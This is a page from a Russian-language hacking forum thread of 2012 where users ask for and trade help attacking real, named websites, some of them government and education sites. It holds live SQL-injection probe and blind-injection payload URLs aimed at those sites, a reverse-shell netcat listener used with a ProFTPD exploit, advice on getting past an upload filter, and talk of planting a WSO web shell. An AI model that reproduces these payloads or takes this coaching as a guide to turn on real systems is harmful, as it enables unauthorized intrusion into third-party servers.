Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 965 of 1207
  1. james00x

    james00x New Member

    Joined:
    6 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Привет, нашел в сервер
    220 ProFTPD 1.3.2e Server (ProFTPD)
    Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/
    У меня ест ТП-Линк - я там поставил виртуал сервер
    ID Service Ports IP Address Protocol Status
    1 45295 192.168.1.100 ALL Enabled
    чтобы работала порт, тогда с netcat открыл тот порт через cmd.

    C:\nc>nc -lvp 45295
    listening on [any] 45295 ...

    ладно тогда открываю новы cmd и запускаю перл ехплоит.
    Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.
    Если все сделал правильно тогда проста там все ок?
     
    #19281 james00x, 6 Feb 2012
  2. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    первое что попалось - http://www.youtube.com/watch?v=k9xe55gq2fc
    уверен, на ачате есть еще способы, стоит только посмотреть внимательней

    как вариант можно крутить как слепую инъекцию
    Code:
    http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+
     
    #19282 trololoman96, 6 Feb 2012
  3. NetAng

    NetAng Member

    Joined:
    29 Dec 2010
    Messages:
    75
    Likes Received:
    12
    Reputations:
    5
    на слепую ругаеться, видимо слишком длинные запросы не проходят.
     
    #19283 NetAng, 6 Feb 2012
    1 person likes this.
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://forum.prodom.ru/viewtopic.php?p=3805'
    не выходит раскрутить.
     
    _________________________
    #19284 yarbabin, 7 Feb 2012
    1 person likes this.
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=1/* true
    http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=0/* true

    Думаю нет скульи.
     
    #19285 Ereee, 7 Feb 2012
    2 people like this.
  6. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    www.ctgroup.kz/?op=mi=node_2566=,view_2599
    дальше одного столбца не продвинулся :( что не так?
     
    #19286 infoseller, 7 Feb 2012
    1 person likes this.
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Там нет инъекции.
     
    #19287 Ereee, 7 Feb 2012
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Почему ты так решил?
     
    _________________________
    #19288 HAXTA4OK, 7 Feb 2012
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    nemaniak, нереально.
    PHP:
    strrchr(${'name'.$i.'_name'},".")==".doc"
    strrchr берет все после точки. Eсли будет shell.php%00.jpg, shell.php.jpg, то на проверку идет:
    php%00.jpg
    php.jpg
    И проверку не пройдет. Как то так.

    HAXTA4OK,
    http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=1 false
    http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=0 false
    не?
     
    #19289 Ereee, 7 Feb 2012
    Last edited: 7 Feb 2012
    1 person likes this.
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Ereee
    http://www.ctgroup.kz/?op=mi=node_2744' and 2>5+--+=,view_2599 False
    http://www.ctgroup.kz/?op=mi=node_2744' and 2>1+--+=,view_2599 True
    не??

    Главное = не юзать
     
    _________________________
    #19290 HAXTA4OK, 7 Feb 2012
    2 people like this.
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    HAXTA4OK,
    спасибо, незнал. А почему:
    http://www.ctgroup.kz/?op=mi=node_2744' and substring(version(),1,1)>1+--+=,view_2599
    false? Не могу понять...


    P.S. Думаю на фильтры... Хотя... нет.
     
    #19291 Ereee, 7 Feb 2012
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Нужно копать в сторону второго запроса
    Вывод где-то рядом

    На самой странице результаты могут быть не видны. Ищите в исходнике по тексту
    PHP:
    <script>$(".l").hide(1);</script>
     
    #19292 M_script, 7 Feb 2012
    1 person likes this.
  13. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Всем хай, вот не могоу раскрутить скулу, вобще возможно ли провести тут sqli или нет если да то каким запросом.
    http://www.mk.gov.kz/?lang=kaz&id_open_rubric=806'
     
    #19293 anonym_di, 7 Feb 2012
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    у меня есть шансы на заливку?

    2Ereee, ну да, только как
     
    _________________________
    #19294 yarbabin, 7 Feb 2012
    Last edited: 7 Feb 2012
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    anonym_di,
    фильтры фильтры...

    faza02,
    шансы всегда есть =)
     
    #19295 Ereee, 7 Feb 2012
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    Залить то зальешь, правда криво шелл может будет работать
     
    _________________________
    #19296 HAXTA4OK, 7 Feb 2012
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    на этом сервере еще есть сайты, стоит их копать, или конфиг везде такой будет?
     
    _________________________
    #19297 yarbabin, 7 Feb 2012
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Везде такой. WSO будет нормально пахать, правда не порутаешь.
     
    #19298 Ereee, 7 Feb 2012
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    хорошо, спасибо.
    а какие еще функции есть, которые не выключены, и через которые можно залить? :)
     
    _________________________
    #19299 yarbabin, 7 Feb 2012
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    так ты что на данный момент имеешь?
     
    _________________________
    #19300 HAXTA4OK, 7 Feb 2012
(You must log in or sign up to post here.)
Page 965 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.